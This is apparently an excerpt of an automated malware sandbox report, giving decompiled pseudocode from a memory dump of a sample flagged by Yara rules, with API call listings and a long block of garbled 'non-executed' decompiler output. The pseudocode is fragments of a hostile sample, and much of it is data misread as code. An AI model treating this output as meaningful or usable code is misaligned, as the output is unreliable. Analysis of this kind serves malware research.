                                    				_t10 =  *(_a4 + 0x10);
                                    				E0041A960(_t13, _t6, _t6 + 0xc70, _t10, 0, 0x34);
                                    				_t8 = _a12;
                                    				asm("adc [ebx-0x3b7cf3b3], cl");
                                    				asm("adc al, 0x52");
                                    				_push(_t8);
                                    				_t9 = RtlAllocateHeap(_t10); // executed
                                    				return _t9;
                                    			}









                                    APIs
                                    • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 30%
                                    			E0041A1D0(intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                    				int _t10;
                                    				WCHAR* _t12;
                                    				void* _t15;
                                    
                                    				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                    				_t12 = _a8;
                                    				_push(_a16);
                                    				_push(_a12);
                                    				_t10 = LookupPrivilegeValueW(_t12, ??, ??); // executed
                                    				return _t10;
                                    			}







                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • API ID: LookupPrivilegeValue
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0041A0B0(intOrPtr _a4, int _a8) {
                                    				void* _t10;
                                    
                                    				_t5 = _a4;
                                    				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                    				ExitProcess(_a8);
                                    			}





                                    APIs
                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • API ID: ExitProcess
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • API ID: AllocateHeap
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • API ID: AllocateHeap
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 72%
                                    			E006A6507(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, signed int* __edi, signed int __esi, void* __fp0) {
                                    				signed char _t266;
                                    				signed char _t267;
                                    				signed char _t268;
                                    				signed char _t270;
                                    				signed char _t271;
                                    				signed char _t272;
                                    				signed char _t273;
                                    				signed char _t274;
                                    				signed char _t276;
                                    				signed char _t277;
                                    				signed int _t278;
                                    				signed char _t279;
                                    				signed char _t281;
                                    				signed char _t282;
                                    				signed int _t283;
                                    				signed char _t285;
                                    				signed int _t286;
                                    				signed char _t288;
                                    				signed char _t289;
                                    				signed char _t292;
                                    				signed int _t293;
                                    				signed int _t294;
                                    				signed int _t295;
                                    				intOrPtr* _t296;
                                    				signed char _t298;
                                    				signed char _t299;
                                    				signed char _t300;
                                    				signed char _t301;
                                    				signed int _t302;
                                    				signed int _t303;
                                    				signed char _t305;
                                    				signed char _t307;
                                    				signed char _t308;
                                    				signed char _t310;
                                    				signed int* _t312;
                                    				signed char _t313;
                                    				signed char _t314;
                                    				intOrPtr* _t316;
                                    				signed char _t318;
                                    				signed char _t319;
                                    				signed char _t321;
                                    				signed char _t323;
                                    				signed char _t324;
                                    				signed char _t326;
                                    				signed char _t327;
                                    				signed char _t329;
                                    				signed char _t330;
                                    				signed char _t331;
                                    				intOrPtr* _t334;
                                    				signed char _t335;
                                    				signed char _t337;
                                    				signed char _t339;
                                    				signed char _t340;
                                    				intOrPtr* _t343;
                                    				signed char _t344;
                                    				signed char _t345;
                                    				intOrPtr* _t348;
                                    				signed char _t349;
                                    				intOrPtr* _t352;
                                    				intOrPtr* _t355;
                                    				signed char _t356;
                                    				intOrPtr* _t359;
                                    				signed char _t360;
                                    				intOrPtr* _t363;
                                    				signed char _t366;
                                    				signed char _t367;
                                    				signed char _t368;
                                    				signed char _t369;
                                    				signed char _t370;
                                    				signed char _t371;
                                    				intOrPtr* _t372;
                                    				void* _t373;
                                    				signed char _t375;
                                    				signed char _t376;
                                    				signed char _t377;
                                    				signed char _t378;
                                    				signed char _t382;
                                    				signed char _t383;
                                    				signed int _t384;
                                    				signed char _t386;
                                    				signed char _t387;
                                    				signed char _t388;
                                    				intOrPtr* _t389;
                                    				intOrPtr* _t391;
                                    				signed char _t393;
                                    				signed char _t394;
                                    				intOrPtr* _t395;
                                    				signed int _t396;
                                    				signed int _t397;
                                    				signed char _t398;
                                    				signed int _t399;
                                    				signed char _t401;
                                    				signed char _t402;
                                    				signed char _t404;
                                    				signed char _t405;
                                    				signed char _t407;
                                    				signed int _t408;
                                    				signed char _t410;
                                    				signed char _t411;
                                    				signed char _t412;
                                    				signed int _t414;
                                    				signed char _t415;
                                    				signed char _t419;
                                    				signed char _t421;
                                    				signed int _t423;
                                    				signed char _t424;
                                    				signed int _t425;
                                    				signed char _t427;
                                    				signed char _t428;
                                    				signed char _t429;
                                    				signed int _t431;
                                    				signed char _t432;
                                    				signed char _t436;
                                    				signed char _t438;
                                    				signed char _t440;
                                    				signed int _t441;
                                    				signed int _t443;
                                    				signed char _t444;
                                    				signed int _t447;
                                    				signed char _t448;
                                    				signed char _t450;
                                    				signed int _t452;
                                    				signed char _t453;
                                    				signed char _t454;
                                    				signed char _t456;
                                    				signed char _t457;
                                    				signed char _t458;
                                    				signed char _t460;
                                    				signed char _t461;
                                    				signed char _t463;
                                    				signed char _t464;
                                    				signed char _t466;
                                    				signed char _t467;
                                    				signed char _t469;
                                    				signed char _t470;
                                    				signed char _t471;
                                    				signed char _t473;
                                    				signed char _t477;
                                    				signed char _t480;
                                    				signed char _t481;
                                    				signed int _t482;
                                    				signed char _t484;
                                    				signed char _t488;
                                    				signed char _t490;
                                    				signed char _t491;
                                    				signed char _t492;
                                    				signed char _t493;
                                    				signed char _t495;
                                    				signed char _t496;
                                    				signed char _t497;
                                    				signed char _t498;
                                    				signed int _t499;
                                    				void* _t501;
                                    				signed char _t502;
                                    				signed char _t503;
                                    				signed char _t504;
                                    				signed char _t505;
                                    				signed char _t510;
                                    				void* _t511;
                                    				void* _t516;
                                    				signed char _t518;
                                    				signed int* _t519;
                                    				signed char _t520;
                                    				signed char _t521;
                                    				signed char _t522;
                                    				signed char _t523;
                                    				signed char _t526;
                                    				signed char _t527;
                                    				signed char _t528;
                                    				signed char _t529;
                                    				signed char _t531;
                                    				signed char _t532;
                                    				signed char _t533;
                                    				signed char _t534;
                                    				signed char _t535;
                                    				signed char _t536;
                                    				signed char _t537;
                                    				signed char _t538;
                                    				signed char _t540;
                                    				signed char _t541;
                                    				void* _t544;
                                    				signed char _t546;
                                    				signed char _t547;
                                    				intOrPtr* _t548;
                                    				void* _t549;
                                    				signed char _t550;
                                    				void* _t554;
                                    				void* _t556;
                                    				signed char _t558;
                                    				signed char _t561;
                                    				signed char _t564;
                                    				signed char _t565;
                                    				signed char _t566;
                                    				signed char _t567;
                                    				signed char _t568;
                                    				signed char _t569;
                                    				void* _t572;
                                    				signed char _t574;
                                    				void* _t577;
                                    				void* _t582;
                                    				void* _t583;
                                    				void* _t584;
                                    				signed char _t586;
                                    				signed char _t587;
                                    				signed char _t593;
                                    				void* _t595;
                                    				signed char _t597;
                                    				signed char _t598;
                                    				signed char _t604;
                                    				void* _t606;
                                    				signed char _t608;
                                    				signed char _t609;
                                    				signed char _t611;
                                    				signed char _t615;
                                    				signed char _t618;
                                    				void* _t628;
                                    				void* _t632;
                                    				signed char _t638;
                                    				signed char _t639;
                                    				signed char _t640;
                                    				signed char _t641;
                                    				signed char _t642;
                                    				signed char _t643;
                                    				signed char _t644;
                                    				signed char _t645;
                                    				signed char _t646;
                                    				signed char _t647;
                                    				signed char _t648;
                                    				void* _t649;
                                    				signed char _t650;
                                    				signed char _t651;
                                    				signed char _t652;
                                    				signed char _t654;
                                    				void* _t655;
                                    				signed int _t656;
                                    				signed char _t658;
                                    				intOrPtr* _t659;
                                    				signed char _t660;
                                    				signed char _t662;
                                    				signed char _t663;
                                    				signed int* _t664;
                                    				signed char _t665;
                                    				signed char _t667;
                                    				signed char _t668;
                                    				signed int _t669;
                                    				intOrPtr* _t670;
                                    				intOrPtr* _t671;
                                    				signed char _t675;
                                    				signed char _t676;
                                    				signed char _t677;
                                    				signed char _t679;
                                    				void* _t680;
                                    				void* _t681;
                                    				signed char _t683;
                                    				signed char _t684;
                                    				signed char _t685;
                                    				signed char _t686;
                                    				signed int* _t688;
                                    				signed int* _t690;
                                    				signed int* _t694;
                                    				void* _t695;
                                    				void* _t696;
                                    				signed int _t698;
                                    				signed int* _t699;
                                    				signed int _t700;
                                    				signed int _t703;
                                    				signed int* _t704;
                                    				signed int _t705;
                                    				void* _t706;
                                    				signed int _t707;
                                    				void* _t708;
                                    				void* _t709;
                                    				void* _t710;
                                    				void* _t711;
                                    				void* _t712;
                                    				void* _t713;
                                    				void* _t715;
                                    				void* _t747;
                                    				void* _t767;
                                    				void* _t795;
                                    				void* _t839;
                                    
                                    				_t839 = __fp0;
                                    				_t698 = __esi;
                                    				_t694 = __edi;
                                    				_push(__edi);
                                    				 *__eax =  *__eax + __eax;
                                    				_t638 = __edx | __edi[0x448a07];
                                    				 *__eax =  *__eax + __eax;
                                    				_t266 = __eax |  *_t638;
                                    				 *_t266 =  *_t266 + _t266;
                                    				 *((intOrPtr*)(__ecx + 0x58)) =  *((intOrPtr*)(__ecx + 0x58)) + _t266;
                                    				asm("insb");
                                    				 *__edi =  *__edi - _t638;
                                    				 *_t638 =  *_t638 + __ecx;
                                    				 *_t266 =  *_t266 + _t705;
                                    				asm("int3");
                                    				 *_t266 =  *_t266 + _t266;
                                    				_t267 = _t266 |  *_t638;
                                    				 *_t267 =  *_t267 + _t267;
                                    				 *((intOrPtr*)(_t267 + 0x58)) =  *((intOrPtr*)(_t267 + 0x58)) + _t267;
                                    				asm("insb");
                                    				 *__edi =  *__edi - _t638;
                                    				 *_t638 =  *_t638 + __ecx;
                                    				_t477 = 0x73;
                                    				 *_t267 =  *_t267 + _t267;
                                    				_t510 = __ecx |  *_t267;
                                    				asm("arpl [eax], ax");
                                    				 *_t638 =  *_t638 + _t510;
                                    				if( *_t638 < 0) {
                                    					 *_t267 =  *_t267 + _t267;
                                    					_t467 = _t267 |  *0x656f17;
                                    					 *_t638 =  *_t638 + _t510;
                                    					 *0x666f17 =  *0x666f17 + _t467;
                                    					 *_t638 =  *_t638 + _t510;
                                    					__edi[0x19] = __edi[0x19] + _t510;
                                    					 *_t467 =  *_t467 + _t467;
                                    					_t469 = (_t467 |  *_t467) + 0x6f;
                                    					_pop(_t632);
                                    					 *_t469 =  *_t469 + _t469;
                                    					_t470 = _t469 |  *_t469;
                                    					 *_t470 = es;
                                    					 *_t470 =  *_t470 + _t470;
                                    					 *((intOrPtr*)(_t705 + 0x280a0000)) =  *((intOrPtr*)(_t705 + 0x280a0000)) - 0x73;
                                    					 *_t470 = 0;
                                    					 *_t470 =  *_t470 + _t470;
                                    					 *_t470 =  *_t470;
                                    					ds = es;
                                    					asm("salc");
                                    					_pop(_t638);
                                    					 *_t470 =  *_t470 + _t470;
                                    					_t471 = _t470 |  *_t638;
                                    					 *0x73 =  *0x73 - 0x73;
                                    					 *_t638 =  *_t638 + _t632 +  *_t470 +  *_t470;
                                    					 *_t471 =  *_t471;
                                    					ds = es;
                                    					 *_t471 =  *_t471 + _t471;
                                    					 *_t471 =  *_t471 + _t471;
                                    					_t473 = (_t471 |  *_t471) + 0x6f;
                                    					_t510 = 0x5c73dad6;
                                    					 *_t473 =  *_t473 + _t473;
                                    					_t267 = _t473 |  *_t638;
                                    				}
                                    				_t511 = _t510 +  *_t267;
                                    				_t268 =  *_t267;
                                    				 *_t698 =  *_t698 + _t268;
                                    				if( *_t698 < 0) {
                                    					 *_t268 =  *_t268 + _t268;
                                    					 *_t268 =  *_t268;
                                    					ds = es;
                                    					asm("adc al, 0xd6");
                                    					_pop(_t688);
                                    					 *_t268 =  *_t268 + _t268;
                                    					asm("adc dh, [ebx+0x5c]");
                                    					 *_t268 =  *_t268 + _t268;
                                    					 *_t268 =  *_t268 + _t268;
                                    					_t463 = (_t268 |  *_t268) + 0x6f;
                                    					_pop(_t628);
                                    					 *_t463 =  *_t463 + _t463;
                                    					_t464 = _t463 |  *_t688;
                                    					 *((intOrPtr*)(_t698 + 0x73060000)) =  *((intOrPtr*)(_t698 + 0x73060000)) - _t628;
                                    					_pop(_t698);
                                    					 *_t464 =  *_t464 + _t464;
                                    					 *_t464 =  *_t464;
                                    					ds = es;
                                    					asm("salc");
                                    					_pop(_t690);
                                    					 *_t464 =  *_t464 + _t464;
                                    					_t477 = _t477 |  *_t694 |  *((_t477 |  *_t694) + _t698 * 2);
                                    					 *_t464 =  *_t464 + _t464;
                                    					 *_t464 =  *_t464 + _t464;
                                    					_t466 = (_t464 |  *_t464) + 0x6f;
                                    					_pop(_t511);
                                    					 *_t466 =  *_t466 + _t466;
                                    					_t268 = _t466 |  *_t690;
                                    					 *((intOrPtr*)(_t268 + _t268 + 0x5e730600)) =  *((intOrPtr*)(_t268 + _t268 + 0x5e730600)) - _t511;
                                    					 *_t268 =  *_t268 + _t268;
                                    				}
                                    				 *_t268 =  *_t268;
                                    				ds = es;
                                    				asm("sbb dl, dh");
                                    				_t639 = ss;
                                    				 *_t268 =  *_t268 + _t268;
                                    				_push(ds);
                                    				if((_t477 |  *_t694) < 0) {
                                    					 *_t268 =  *_t268 + _t268;
                                    					 *_t268 =  *_t268 + _t268;
                                    					_t456 = (_t268 |  *_t268) + 0x6f;
                                    					 *_t456 =  *_t456 + _t456;
                                    					_t457 = _t456 |  *_t639;
                                    					 *((intOrPtr*)(_t457 + 0x73060000)) =  *((intOrPtr*)(_t457 + 0x73060000)) - _t639;
                                    					_pop(_t698);
                                    					 *_t457 =  *_t457 + _t457;
                                    					_t684 = _t639 |  *_t698;
                                    					 *_t457 =  *_t457 + _t457;
                                    					_t458 = _t457 |  *_t684;
                                    					 *((intOrPtr*)(_t684 - 0x25fa0000)) =  *((intOrPtr*)(_t684 - 0x25fa0000)) - _t458;
                                    					_pop(ds);
                                    					asm("adc al, 0xd6");
                                    					_pop(_t685);
                                    					 *_t458 =  *_t458 + _t458;
                                    					asm("adc dh, [ebx+0x5c]");
                                    					 *_t458 =  *_t458 + _t458;
                                    					 *_t458 =  *_t458 + _t458;
                                    					_t460 = (_t458 |  *_t458) + 0x6f;
                                    					 *_t460 =  *_t460 + _t460;
                                    					_t461 = _t460 |  *_t685;
                                    					 *((intOrPtr*)(_t461 + _t461 + 0x5e730600)) =  *((intOrPtr*)(_t461 + _t461 + 0x5e730600)) - _t685;
                                    					 *_t461 =  *_t461 + _t461;
                                    					_t686 = _t685 |  *_t698;
                                    					 *_t461 =  *_t461 + _t461;
                                    					_t268 = _t461 |  *_t686;
                                    					 *((intOrPtr*)(_t686 - 0x25fa0000)) =  *((intOrPtr*)(_t686 - 0x25fa0000)) - _t268;
                                    				}
                                    				asm("ficomp dword [edi]");
                                    				asm("salc");
                                    				_pop(_t640);
                                    				 *_t268 =  *_t268 + _t268;
                                    				_pop(_t715);
                                    				 *_t268 =  *_t268 + _t268;
                                    				 *_t268 =  *_t268 + _t268;
                                    				_t270 = (_t268 |  *_t268) + 0x6f;
                                    				_pop(_t516);
                                    				 *_t270 =  *_t270 + _t270;
                                    				while(1) {
                                    					_t271 = _t270 |  *_t640;
                                    					 *((intOrPtr*)(_t640 + 0x73060000)) =  *((intOrPtr*)(_t640 + 0x73060000)) - _t640;
                                    					_pop(_t699);
                                    					 *_t271 =  *_t271 + _t271;
                                    					_t641 = _t640 |  *_t699;
                                    					_pop(_t480);
                                    					 *_t271 =  *_t271 + _t271;
                                    					_t272 = _t271 |  *_t641;
                                    					 *((intOrPtr*)(_t641 - 0x25fa0000)) =  *((intOrPtr*)(_t641 - 0x25fa0000)) - _t272;
                                    					_pop(ds);
                                    					asm("sbb dl, dh");
                                    					_t518 = _t516 +  *_t271 +  *_t272;
                                    					_pop(_t642);
                                    					 *_t272 =  *_t272 + _t272;
                                    					_t481 = _t480 |  *_t694;
                                    					_push(ds);
                                    					if(_t481 >= 0) {
                                    						break;
                                    					}
                                    					 *_t272 =  *_t272 + _t272;
                                    					_t618 = _t518 | _t694[0x18];
                                    					 *_t272 =  *_t272 + _t272;
                                    					_t452 = _t272 |  *_t272;
                                    					asm("sbb al, 0x8d");
                                    					 *_t618 =  *_t618 + _t452;
                                    					_t453 = _t452 & 0x5a280216;
                                    					 *_t453 =  *_t453 + _t453;
                                    					_t505 = _t481 |  *_t694;
                                    					 *_t453 =  *_t453 + _t453;
                                    					_t454 = _t453 |  *( &(_t694[0x9404000]) + (_t642 |  *(_t505 - 0x70)));
                                    					_pop(ss);
                                    					_t516 = _t618 +  *_t454;
                                    					_pop(_t683);
                                    					 *_t454 =  *_t454 + _t454;
                                    					_t481 = _t505 |  *_t694;
                                    					_t704 =  &(_t699[0]);
                                    					asm("ficomp dword [edi]");
                                    					_t640 = _t683 |  *(_t481 - 0x70);
                                    					 *_t454 =  *_t454 + _t454;
                                    					_t270 = _t454 |  *( &(_t694[0x9404000]) + _t640);
                                    					asm("sbb [edx], al");
                                    					 *_t640 =  *_t640 - _t481;
                                    					 *_t640 =  *_t640 + _t516;
                                    					_pop(ds);
                                    					_t715 = _t715 - 1;
                                    					asm("ficomp dword [edi]");
                                    					_push(ss);
                                    					if( *_t640 >= 0) {
                                    						continue;
                                    					} else {
                                    						 *_t270 =  *_t270 + _t270;
                                    						_t272 = _t270 |  *( &(_t694[0x9404000]) + _t640);
                                    						asm("sbb [edx], eax");
                                    						 *_t640 =  *_t640 - _t481;
                                    						 *_t640 =  *_t640 + _t516;
                                    						_pop(ds);
                                    						_t699 =  &(_t704[0]);
                                    						asm("ficomp dword [edi]");
                                    					}
                                    					break;
                                    				}
                                    				_pop(ds);
                                    				_t643 = _t642 &  *(_t481 - 0x70);
                                    				 *_t272 =  *_t272 + _t272;
                                    				_t273 = _t272 |  *( &(_t694[0x9404000]) + _t643);
                                    				asm("sbb al, [edx]");
                                    				 *_t643 =  *_t643 - _t481;
                                    				 *_t643 =  *_t643 + _t518;
                                    				_pop(ds);
                                    				_t644 = _t643 &  *(_t481 - 0x70);
                                    				 *_t273 =  *_t273 + _t273;
                                    				_t274 = _t273 |  *( &(_t694[0x9404000]) + _t644);
                                    				asm("sbb eax, [edx]");
                                    				 *_t644 =  *_t644 - _t481;
                                    				 *_t644 =  *_t644 + _t518;
                                    				_pop(ds);
                                    				_t645 = _t644 |  *(_t481 - 0x70);
                                    				 *_t274 =  *_t274 + _t274;
                                    				_t276 = (_t274 |  *( &(_t694[0x4c04000]) + _t645)) + 4;
                                    				asm("outsd");
                                    				_pop(_t519);
                                    				 *_t276 =  *_t276 + _t276;
                                    				_t277 = _t276 |  *_t645;
                                    				_t699[0x1cc18000] = _t699[0x1cc18000] - _t645;
                                    				_pop(_t700);
                                    				 *_t277 =  *_t277 + _t277;
                                    				_t646 = _t645 |  *_t519;
                                    				_t278 = _t277 + 0x6f;
                                    				asm("les eax, [eax]");
                                    				 *_t646 =  *_t646 + _t519;
                                    				 *_t646 =  *_t646 + _t278;
                                    				 *((intOrPtr*)(_t700 + 0x16060000)) =  *((intOrPtr*)(_t700 + 0x16060000)) - _t481;
                                    				 *_t519 =  *_t519 + 1;
                                    				asm("adc ecx, [ebx]");
                                    				asm("adc [ebx], ecx");
                                    				_pop(_t520);
                                    				 *_t278 =  *_t278 + _t278;
                                    				_t521 = _t520 |  *_t278;
                                    				asm("int 0x0");
                                    				 *_t646 =  *_t646 + _t521;
                                    				_t522 = _t521 +  *_t278;
                                    				_pop(_t647);
                                    				 *_t278 =  *_t278 + _t278;
                                    				_t482 = _t481 |  *_t694;
                                    				asm("adc al, 0xda");
                                    				_pop(ds);
                                    				_t279 = _t278 | 0x101f101f;
                                    				if(_t279 >= 0) {
                                    					L15:
                                    					asm("adc [ebx+0x5c], dh");
                                    					 *_t279 =  *_t279 + _t279;
                                    					goto L16;
                                    				} else {
                                    					 *_t279 =  *_t279 + _t279;
                                    					 *_t279 =  *_t279 + _t279;
                                    					_t447 = (_t279 |  *_t279) + 0x6f;
                                    					_pop(_t615);
                                    					 *_t447 =  *_t447 + _t447;
                                    					_t448 = _t482;
                                    					_t482 = _t447;
                                    					 *_t448 =  *_t448 + _t448;
                                    					 *_t647 =  *_t647 - _t482;
                                    					 *_t647 =  *_t647 + (_t615 |  *_t447);
                                    					_pop(ds);
                                    					asm("adc al, 0xda");
                                    					_pop(ds);
                                    					_t450 = _t448 |  *_t647 | 0x0000001f;
                                    					asm("adc [edi], bl");
                                    					asm("adc [ebx+0x5c], dh");
                                    					 *_t450 =  *_t450 + _t450;
                                    					 *_t450 =  *_t450 + _t450;
                                    					_t281 = (_t450 |  *_t450) + 0x6f;
                                    					_pop(_t522);
                                    					 *_t281 =  *_t281 + _t281;
                                    					_t648 = _t647 |  *(_t647 - 7);
                                    					 *_t281 =  *_t281 + _t281;
                                    					if( *_t281 < 0) {
                                    						L20:
                                    						_t443 = (_t281 |  *_t281) + 0x6f;
                                    						_pop(_t611);
                                    						 *_t443 =  *_t443 + _t443;
                                    						_t444 = _t482;
                                    						_t482 = _t443;
                                    						 *_t444 =  *_t444 + _t444;
                                    						 *_t648 =  *_t648 - _t482;
                                    						 *_t648 =  *_t648 + (_t611 |  *_t443);
                                    						_pop(ds);
                                    						asm("adc al, 0xda");
                                    						_pop(ds);
                                    						_t279 = _t444 |  *_t648 | 0x0000001f;
                                    						asm("adc [edi], bl");
                                    						asm("adc [ebx+0x5c], dh");
                                    						 *_t279 =  *_t279 + _t279;
                                    						goto L21;
                                    					} else {
                                    						_t705 = _t705 - 1;
                                    						 *_t281 =  *_t281 + _t281;
                                    						if( *_t281 < 0) {
                                    							L16:
                                    							_t523 = _t522 |  *_t279;
                                    							asm("arpl [eax], ax");
                                    							 *_t647 =  *_t647 + _t523;
                                    							if( *_t647 >= 0) {
                                    								L21:
                                    								asm("outsd");
                                    								asm("movsb");
                                    								 *_t279 =  *_t279 + _t279;
                                    								_t281 = (_t279 |  *_t279) + 0x6f;
                                    								_pop(_t524);
                                    								 *_t281 =  *_t281 + _t281;
                                    								_t648 = _t647 |  *(_t647 - 7);
                                    								 *_t281 =  *_t281 + _t281;
                                    								if( *_t281 < 0) {
                                    									goto L30;
                                    								} else {
                                    									_t705 = _t705 - 1;
                                    									 *_t281 =  *_t281 + _t281;
                                    									if( *_t281 < 0) {
                                    										goto L26;
                                    									} else {
                                    										 *_t281 =  *_t281 + _t281;
                                    										_t81 = _t524 + 0x17;
                                    										 *_t81 =  *(_t524 + 0x17) & _t281;
                                    										if( *_t81 >= 0) {
                                    											goto L28;
                                    										} else {
                                    											 *_t281 =  *_t281 + _t281;
                                    											_t524 = _t524 |  *_t281;
                                    											asm("into");
                                    											 *_t281 =  *_t281 + _t281;
                                    											_t281 = _t281 |  *_t648;
                                    											 *_t648 =  *_t648 - _t482;
                                    											 *_t648 =  *_t648 + _t524;
                                    											_pop(ds);
                                    											asm("adc al, 0xda");
                                    											_pop(ds);
                                    											_t482 = _t482 |  *_t694;
                                    											asm("adc [edi], bl");
                                    											goto L25;
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								 *_t279 =  *_t279 + _t279;
                                    								_t440 = _t279 |  *0x656f17;
                                    								 *_t647 =  *_t647 + _t523;
                                    								 *0x666f17 =  *0x666f17 + _t440;
                                    								 *_t647 =  *_t647 + _t523;
                                    								_t694[0x19] = _t694[0x19] + _t523;
                                    								 *_t440 =  *_t440 + _t440;
                                    								_t441 = _t440 |  *_t440;
                                    								 *_t441 =  *_t441 + _t482;
                                    								asm("rol dword [eax], 1");
                                    								 *_t441 =  *_t441 + _t441;
                                    								 *((intOrPtr*)(_t694 + _t705 * 2)) =  *((intOrPtr*)(_t694 + _t705 * 2)) + _t441;
                                    								_pop(_t608);
                                    								 *_t441 =  *_t441 + _t441;
                                    								_t609 = _t608 |  *_t441;
                                    								asm("int 0x0");
                                    								 *_t647 =  *_t647 + _t609;
                                    								_t524 = _t609 +  *_t441;
                                    								_pop(_t648);
                                    								 *_t441 =  *_t441 + _t441;
                                    								_t482 = _t482 |  *_t694;
                                    								asm("adc al, 0xda");
                                    								_pop(ds);
                                    								_t281 = _t441 | 0x101f101f;
                                    								if(_t281 >= 0) {
                                    									L25:
                                    									asm("adc [ebx+0x5c], dh");
                                    									 *_t281 =  *_t281 + _t281;
                                    									L26:
                                    									_t527 = _t524 |  *_t281;
                                    									asm("arpl [eax], ax");
                                    									 *_t648 =  *_t648 + _t527;
                                    									_t747 =  *_t648;
                                    									if(_t747 >= 0) {
                                    										L31:
                                    										asm("int 0x0");
                                    										 *_t648 =  *_t648 + _t527;
                                    										_t528 = _t527 +  *_t281;
                                    										_pop(_t649);
                                    										 *_t281 =  *_t281 + _t281;
                                    										_t482 = _t482 |  *_t694;
                                    										_t650 = _t649 - _t482;
                                    										_pop(ds);
                                    										_t283 = _t281 | 0x101f101f;
                                    										if(_t283 >= 0) {
                                    											goto L37;
                                    										} else {
                                    											 *_t283 =  *_t283 + _t283;
                                    											 *_t283 =  *_t283 + _t283;
                                    											_t431 = (_t283 |  *_t283) + 0x6f;
                                    											_pop(_t604);
                                    											 *_t431 =  *_t431 + _t431;
                                    											_t524 = _t604 |  *_t431;
                                    											_t432 = _t482;
                                    											_t482 = _t431;
                                    											 *_t432 =  *_t432 + _t432;
                                    											 *_t650 =  *_t650 - _t482;
                                    											 *_t650 =  *_t650 + (_t604 |  *_t431);
                                    											_pop(ds);
                                    											_t648 = _t650 - _t482;
                                    											_pop(ds);
                                    											_t281 = _t432 |  *_t650 | 0x0000001f;
                                    											asm("adc [edi], bl");
                                    											asm("adc [ebx+0x5c], dh");
                                    											goto L33;
                                    										}
                                    									} else {
                                    										 *_t281 =  *_t281 + _t281;
                                    										_t436 = _t281 |  *0x656f17;
                                    										 *_t648 =  *_t648 + _t527;
                                    										 *0x666f17 =  *0x666f17 + _t436;
                                    										 *_t648 =  *_t648 + _t527;
                                    										_t694[0x19] = _t694[0x19] + _t527;
                                    										 *_t436 =  *_t436 + _t436;
                                    										_t438 = (_t436 |  *_t436) + 0x6f;
                                    										_pop(_t606);
                                    										 *_t438 =  *_t438 + _t438;
                                    										_t482 = _t482 |  *_t694;
                                    										 *_t438 =  *_t438 + _t438;
                                    										_t524 = _t606 - _t438 |  *_t438;
                                    										 *_t438 = 0;
                                    										_t648 = _t648 |  *(_t482 + 0x5e);
                                    										 *_t438 =  *_t438 + _t438;
                                    										 *_t648 =  *_t648 - _t482;
                                    										 *_t648 =  *_t648 + _t524;
                                    										ds = _t438;
                                    										asm("adc al, 0xda");
                                    										_pop(ds);
                                    										_t281 = _t438 |  *_t648 | 0x0000001f;
                                    										asm("adc [edi], bl");
                                    										asm("adc [ebx+0x5c], esi");
                                    										L28:
                                    										if(_t747 >= 0) {
                                    											L33:
                                    											 *_t281 =  *_t281 + _t281;
                                    											 *_t281 =  *_t281 + _t281;
                                    											_t285 = (_t281 |  *_t281) + 0x6f;
                                    											_pop(_t528);
                                    											 *_t285 =  *_t285 + _t285;
                                    											_t651 = _t648 |  *(_t648 - 3);
                                    											 *_t285 =  *_t285 + _t285;
                                    											if( *_t285 < 0) {
                                    												L43:
                                    												_t427 = (_t285 |  *_t285) + 0x6f;
                                    												 *_t427 =  *_t427 + _t427;
                                    												_t428 = _t482;
                                    												_t504 = _t427;
                                    												 *_t428 =  *_t428 + _t428;
                                    												_t429 = _t428 |  *_t651;
                                    												 *_t651 =  *_t651 - _t504;
                                    												_pop(_t681);
                                    												 *_t429 =  *_t429 + _t429;
                                    												_t482 = _t504 |  *_t694;
                                    												_t650 = _t681 - _t482;
                                    												_pop(ds);
                                    												_t283 = _t429 | 0x0000001f;
                                    												asm("adc [edi], bl");
                                    												asm("adc [ebx+0x5c], dh");
                                    												 *_t283 =  *_t283 + _t283;
                                    												goto L45;
                                    											} else {
                                    												_t705 = _t705 - 1;
                                    												 *_t285 =  *_t285 + _t285;
                                    												if( *_t285 < 0) {
                                    													_t529 = _t528 |  *_t283;
                                    													asm("arpl [eax], ax");
                                    													 *_t650 =  *_t650 + _t529;
                                    													if( *_t650 >= 0) {
                                    														L45:
                                    														asm("outsd");
                                    														asm("movsb");
                                    														 *_t283 =  *_t283 + _t283;
                                    														_t285 = (_t283 |  *_t283) + 0x6f;
                                    														_pop(_t530);
                                    														 *_t285 =  *_t285 + _t285;
                                    														_t651 = _t650 |  *(_t650 - 3);
